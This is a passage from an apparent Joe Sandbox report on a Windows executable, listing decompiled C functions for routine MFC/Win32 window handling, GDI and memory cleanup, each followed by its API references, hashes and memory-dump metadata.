						_t19 =  *((intOrPtr*)(E00436178(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0043185D(E0043BF7D(_t23, _t24, _t25, _t26));
					}
				}
			}








                  0x00435257
                  0x00435257
                  0x00435257
                  0x00435261
                  0x00435268
                  0x00435287
                  0x0043528e
                  0x00435295
                  0x0043529a
                  0x0043529a
                  0x0043529a
                  0x00000000
                  0x0043526a
                  0x0043526a
                  0x0043526f
                  0x0043529c
                  0x0043529c
                  0x0043529f
                  0x00435271
                  0x00435276
                  0x004364bc
                  0x004364be
                  0x004364c3
                  0x004364cd
                  0x004364d2
                  0x004364d4
                  0x004364d8
                  0x004364e3
                  0x004364e3
                  0x004364f4
                  0x004364f4
                  0x0043526f

                  APIs
                  • __getptd.LIBCMT ref: 00435271
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00435282
                  • __getptd.LIBCMT ref: 00435290
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction ID: ce40cc71b876635b456ab49842eecf86f574a445523513ec0804e5d9cbf1e949
                  • Opcode Fuzzy Hash: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction Fuzzy Hash: 33E04F35500205AFCB60ABA5C446B6E33A4EB4E318F16A1E7E40CC7323C77CD850994A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00422744, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E00422744(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                  0x0042274c
                  0x0042275a
                  0x00422762
                  0x0042276f
                  0x00422772
                  0x00422764
                  0x00422769
                  0x00422769
                  0x0042277b

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • SetLastError.KERNEL32(00000078), ref: 00422772
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction ID: c3a8ff1e6a70369a334e9d65533ec26824e18546c235e0bade0a9994c07655bf
                  • Opcode Fuzzy Hash: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction Fuzzy Hash: 1AD0C232B442207BD2212F726D4DA163E80BB89BA33594661BC26E31D0CAA8CC008758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424CB8, Relevance: 7.6, APIs: 5, Instructions: 100keyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424CB8(void* __ecx, void* __eflags, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _t44;
				signed int _t48;
				signed int _t52;
				signed int _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t80;

				_t80 = __eflags;
				_t75 = __ecx;
				_v8 = E00412B38(__ecx);
				GetWindowRect( *(__ecx + 0x20),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E0040ED96(_t75, _t80);
				if((_v8 & 0x00001000) == 0) {
					L5:
					__eflags = _t76 - 0xa;
					if(_t76 < 0xa) {
						L7:
						__eflags = _t76 - 4;
						if(_t76 != 4) {
							L16:
							return _t76;
						}
						L8:
						__eflags = _v8 & 0x00000800;
						if((_v8 & 0x00000800) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							__eflags = _v8 & 0x00000200;
							if((_v8 & 0x00000200) == 0) {
								goto L16;
							}
							_t44 = _t76 - 4;
							__eflags = _t44;
							if(_t44 == 0) {
								L21:
								__eflags = _a8 - _v24.bottom;
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							__eflags = _t48;
							if(_t48 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							__eflags = _t52;
							if(_t52 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							__eflags = _t57;
							if(_t57 == 0) {
								__eflags = _a8 - _v24.bottom;
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							__eflags = _t57 == 1;
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
					__eflags = _t76 - 0x11;
					if(_t76 <= 0x11) {
						goto L8;
					}
					goto L7;
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                  0x00424cb8
                  0x00424cc3
                  0x00424cca
                  0x00424cd4
                  0x00424ce6
                  0x00424cec
                  0x00424cfa
                  0x00424cfc
                  0x00424d17
                  0x00424d17
                  0x00424d1a
                  0x00424d21
                  0x00424d21
                  0x00424d24
                  0x00424d63
                  0x00000000
                  0x00424d63
                  0x00424d26
                  0x00424d26
                  0x00424d2d
                  0x00424d3e
                  0x00424d44
                  0x00424d4b
                  0x00000000
                  0x00000000
                  0x00424d4f
                  0x00424d4f
                  0x00424d52
                  0x00424da1
                  0x00424da6
                  0x00000000
                  0x00424dac
                  0x00424d54
                  0x00424d54
                  0x00424d57
                  0x00424d95
                  0x00000000
                  0x00424d9b
                  0x00424d59
                  0x00424d59
                  0x00424d5a
                  0x00424d85
                  0x00000000
                  0x00424d8b
                  0x00424d5d
                  0x00424d5d
                  0x00424d5e
                  0x00424d71
                  0x00000000
                  0x00424d7b
                  0x00424d60
                  0x00424d61
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00424d61
                  0x00424d31
                  0x00000000
                  0x00424d31
                  0x00424d1c
                  0x00424d1f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00424d1f
                  0x00424d01
                  0x00424d05
                  0x00424d05
                  0x00424d11
                  0x00000000
                  0x00424d13
                  0x00000000
                  0x00424d13

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetWindowRect.USER32 ref: 00424CD4
                  • GetSystemMetrics.USER32 ref: 00424CE2
                  • GetSystemMetrics.USER32 ref: 00424CE8
                  • GetKeyState.USER32(00000002), ref: 00424D08
                  • InflateRect.USER32(?,00000000,00000000), ref: 00424D3E
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction ID: e3ecd6cb329665b2cd8a2448089bf16f9698f38525433f5d73bdf6f6ead89f03
                  • Opcode Fuzzy Hash: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction Fuzzy Hash: F631F732B20128ABDB30DBA8F849AAF77A4EBC5394F954417D502D7180DA7CDD41C659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405112, Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00405112(intOrPtr __ecx, void* __eflags, struct tagRECT* _a4) {
				intOrPtr _v8;
				signed int _v12;
				void* __ebx;
				void* _t23;
				void* _t39;
				long _t41;
				void* _t45;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t45 = E0040474E(__ecx);
				_t39 = E004045BE(0, _t45, 0);
				if(_t39 == 0 || _t39 == _v8) {
					_v12 = GetWindowLongA( *(_t45 + 0xe8), 0xffffffec);
					if(_t39 == 0 || (E00412B52(_v8) & 0x00000200) != 0 || (E00412B38(_v8) & 0x01000000) == 0) {
						_t41 = _v12 | 0x00000200;
					} else {
						_t41 = _v12 & 0xfffffdff;
					}
					if(_v12 == _t41) {
						goto L11;
					} else {
						RedrawWindow( *(_t45 + 0xe8), 0, 0, 0x81);
						SetWindowLongA( *(_t45 + 0xe8), 0xffffffec, _t41);
						SetWindowPos( *(_t45 + 0xe8), 0, 0, 0, 0, 0, 0x137);
						if(_a4 != 0) {
							GetClientRect( *(_t45 + 0xe8), _a4);
						}
						_t23 = 1;
					}
				} else {
					L11:
					_t23 = 0;
				}
				return _t23;
			}










                  0x00405117
                  0x00405118
                  0x0040511c
                  0x00405124
                  0x00405130
                  0x00405134
                  0x0040514d
                  0x00405152
                  0x00405180
                  0x00405172
                  0x00405175
                  0x00405175
                  0x00405189
                  0x00000000
                  0x0040518b
                  0x00405198
                  0x004051a7
                  0x004051bd
                  0x004051c6
                  0x004051d1
                  0x004051d1
                  0x004051d9
                  0x004051d9
                  0x004051dc
                  0x004051dc
                  0x004051dc
                  0x004051dc
                  0x004051e2

                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                  • GetWindowLongA.USER32 ref: 00405147
                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 00405198
                  • SetWindowLongA.USER32 ref: 004051A7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 004051BD
                  • GetClientRect.USER32 ref: 004051D1
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClientRectRedraw
                  • String ID:
                  • API String ID: 556606033-0
                  • Opcode ID: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction ID: 7aaf3126d674e3e7048fbaf7b7e8ae3f530f56a6ff30dac5665c823baf7d5697
                  • Opcode Fuzzy Hash: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction Fuzzy Hash: F211D232900508FFDB206F65CC45FAFBA79EB81350F21463AF516BA1E0CA355D41CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00408A69, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00408A69(void* __ecx, unsigned int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t20;
				void* _t21;
				void* _t23;
				void* _t27;
				void* _t33;
				void* _t35;
				struct HWND__* _t36;

				_t28 = __ecx;
				_t35 = __ecx;
				if((E00412B38(__ecx) & 0x40000000) == 0) {
					_t28 = __ecx;
					_t27 = E0040F8D7(__ecx);
				} else {
					_t27 = __ecx;
				}
				_t38 = _t27;
				if(_t27 == 0) {
					E00406436(_t27, _t28, _t33, _t35, _t38);
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E00412C5B(_t27);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t35) {
						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t36 = _t20;
					if(_t36 == 0) {
						break;
					}
					_t21 = E00408105( *(_t27 + 0x20), _t36);
					__eflags = _t21;
					if(_t21 != 0) {
						SendMessageA(_t36, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t36);
				}
				return _t20;
			}














                  0x00408a69
                  0x00408a71
                  0x00408a7d
                  0x00408a83
                  0x00408a8a
                  0x00408a7f
                  0x00408a7f
                  0x00408a7f
                  0x00408a8c
                  0x00408a8e
                  0x00408a90
                  0x00408a90
                  0x00408a9f
                  0x00408aa3
                  0x00408ab3
                  0x00408ae7
                  0x00408abd
                  0x00408abd
                  0x00408ad0
                  0x00408ad2
                  0x00408ad2
                  0x00408ab3
                  0x00408ae9
                  0x00408af1
                  0x00408b11
                  0x00408b11
                  0x00408b17
                  0x00408b1b
                  0x00000000
                  0x00000000
                  0x00408af8
                  0x00408afd
                  0x00408aff
                  0x00408b0c
                  0x00408b0c
                  0x00408b0e
                  0x00408b10
                  0x00408b10
                  0x00408b21

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00408AD0
                  • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00408AE7
                  • GetDesktopWindow.USER32 ref: 00408AEB
                  • SendMessageA.USER32(00000000,0000036D,0000000C,00000000), ref: 00408B0C
                  • GetWindow.USER32(00000000), ref: 00408B11
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction ID: d32bd3ced13832ff189fd8f6ba1fa6c44edaf74d9e9f2573400e8018fbc2a9f8
                  • Opcode Fuzzy Hash: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction Fuzzy Hash: 3B11D03130071577EB316B568E46F9B3A19AF40764F16403FBA82796D1CEF9D8018EAC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406DB6, Relevance: 7.6, APIs: 5, Instructions: 60windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406DB6(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xb0) = _a4;
					 *(_t46 + 0xb4) = _a8;
					 *(_t46 + 0xa8) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xac) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x462630 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb4) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                  0x00406dbc
                  0x00406dc9
                  0x00406e44
                  0x00406e4d
                  0x00406e56
                  0x00406e5c
                  0x00406e5f
                  0x00000000
                  0x00406e5f
                  0x00406dec
                  0x00406e05
                  0x00406e11
                  0x00406e1d
                  0x00406e25
                  0x00406e2b
                  0x00406e2b
                  0x00000000

                  APIs
                  • IsWindow.USER32(?), ref: 00406DC1
                  • SendMessageA.USER32(?,00000420,00000000,?), ref: 00406DEC
                  • SendMessageA.USER32(?,0000041F,00000000,?), ref: 00406E05
                  • SendMessageA.USER32(?,0000043A,00000000,00000000), ref: 00406E1D
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00406E37
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction ID: 4717757c02217832fd9b412043661d7cdff3795e995a25a39b476dc6cc087278
                  • Opcode Fuzzy Hash: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction Fuzzy Hash: CD115EB5100318AFE7108F29CC84AB7B7E9FB44344F01452EF99AC2160D7B0AC50DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042A16F, Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042A16F(void* _a4, void* _a8) {
				void* _t7;
				DEVMODEA* _t8;
				struct HDC__* _t17;
				void* _t21;
				struct HDC__* _t25;
				signed short* _t28;

				if(_a4 != 0) {
					_t7 = GlobalLock(_a4);
					_t21 = _a8;
					_t28 = _t7;
					if(_t21 == 0) {
						_t8 = 0;
					} else {
						_t8 = GlobalLock(_t21);
					}
					if(_t28 != 0) {
						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
						GlobalUnlock(_a4);
						if(_t21 != 0) {
							GlobalUnlock(_t21);
						}
						_t17 = _t25;
					} else {
						_t17 = 0;
					}
					return _t17;
				}
				return 0;
			}









                  0x0042a178
                  0x0042a18a
                  0x0042a18c
                  0x0042a18f
                  0x0042a193
                  0x0042a19a
                  0x0042a195
                  0x0042a196
                  0x0042a196
                  0x0042a19e
                  0x0042a1c8
                  0x0042a1ca
                  0x0042a1ce
                  0x0042a1d1
                  0x0042a1d1
                  0x0042a1d3
                  0x0042a1a0
                  0x0042a1a0
                  0x0042a1a0
                  0x00000000
                  0x0042a1d7
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalLock
                  • String ID:
                  • API String ID: 2848605275-0
                  • Opcode ID: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction ID: 2c7e1155eccb6f0b88d5b3aa029337c93f042f81e7a86a2626123610b555cf53
                  • Opcode Fuzzy Hash: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction Fuzzy Hash: 8E01D132300635ABC7215B6AEC44A377EDCEF887B1B544422BD49C3600D638CC30D6A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004088DE, Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004088DE(void* __ecx) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				int _t11;
				void* _t13;
				void* _t18;
				void* _t26;

				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
					_t11 = PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3);
					_t18 = PostMessageA;
					if(_t11 == 0) {
						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t26 + 0x20)) {
						ReleaseCapture();
					}
					_t13 = E0040F8D7(_t26);
					_t30 = _t13;
					if(_t13 == 0) {
						_t13 = E00406436(_t18, 0, 0x367, _t26, _t30);
					}
					 *((intOrPtr*)(_t26 + 0x68)) = 0;
					 *((intOrPtr*)(_t13 + 0x68)) = 0;
					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
				}
				return _t9;
			}













                  0x004088e7
                  0x004088ed
                  0x00408901
                  0x00408907
                  0x0040890f
                  0x00408919
                  0x00408919
                  0x00408924
                  0x00408926
                  0x00408926
                  0x0040892e
                  0x00408935
                  0x00408937
                  0x00408939
                  0x00408939
                  0x00408940
                  0x00408948
                  0x00000000
                  0x00408951
                  0x00408954

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction ID: 57fe4fcd219db2e76da600668b61a162516832e2059398302be7d6c9e2b70dbe
                  • Opcode Fuzzy Hash: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction Fuzzy Hash: 8A0167755006007FE7257B66DC59F2B7ABDFB85718F10493DF182A22E1EA74EC00C669
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420BAF, Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420BAF(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E004209F9(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                  0x00420bb2
                  0x00420bb4
                  0x00420bba
                  0x00420bbc
                  0x00420bbc
                  0x00420bc4
                  0x00420bc9
                  0x00420bcb
                  0x00420bbc
                  0x00420bcf
                  0x00420bd4
                  0x00420bd7
                  0x00420bd7
                  0x00420bdd
                  0x00420be2
                  0x00420beb
                  0x00420bee
                  0x00420bf5
                  0x00420bf5
                  0x00420bff
                  0x00420c07

                  APIs
                  • TlsFree.KERNEL32(?,?,?,00420C15), ref: 00420BD7
                  • GlobalHandle.KERNEL32 ref: 00420BE5
                  • GlobalUnlock.KERNEL32(00000000,?,?,00420C15), ref: 00420BEE
                  • GlobalFree.KERNEL32 ref: 00420BF5
                  • DeleteCriticalSection.KERNEL32(?,?,?,00420C15), ref: 00420BFF
                    • Part of subcall function 004209F9: EnterCriticalSection.KERNEL32(00466584,?,00466568,00466584,00466568,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                    • Part of subcall function 004209F9: LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                    • Part of subcall function 004209F9: LocalFree.KERNEL32(?,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                    • Part of subcall function 004209F9: TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction ID: 3e9e6558ba584311e6215c2e42c48fddda6ce4580923e77d2502095fd869f7fc
                  • Opcode Fuzzy Hash: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction Fuzzy Hash: 10F0903A3002205BD3215B6ABC4CE1B3AE9BF867643550669F955D3252CB64EC028668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042CD27, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042CD27(void* __ecx) {
				int _v8;

				_push(__ecx);
				_v8 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _v8;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _v8;
			}




                  0x0042cd2c
                  0x0042cd40
                  0x0042cd43
                  0x0042cd70
                  0x0042cd45
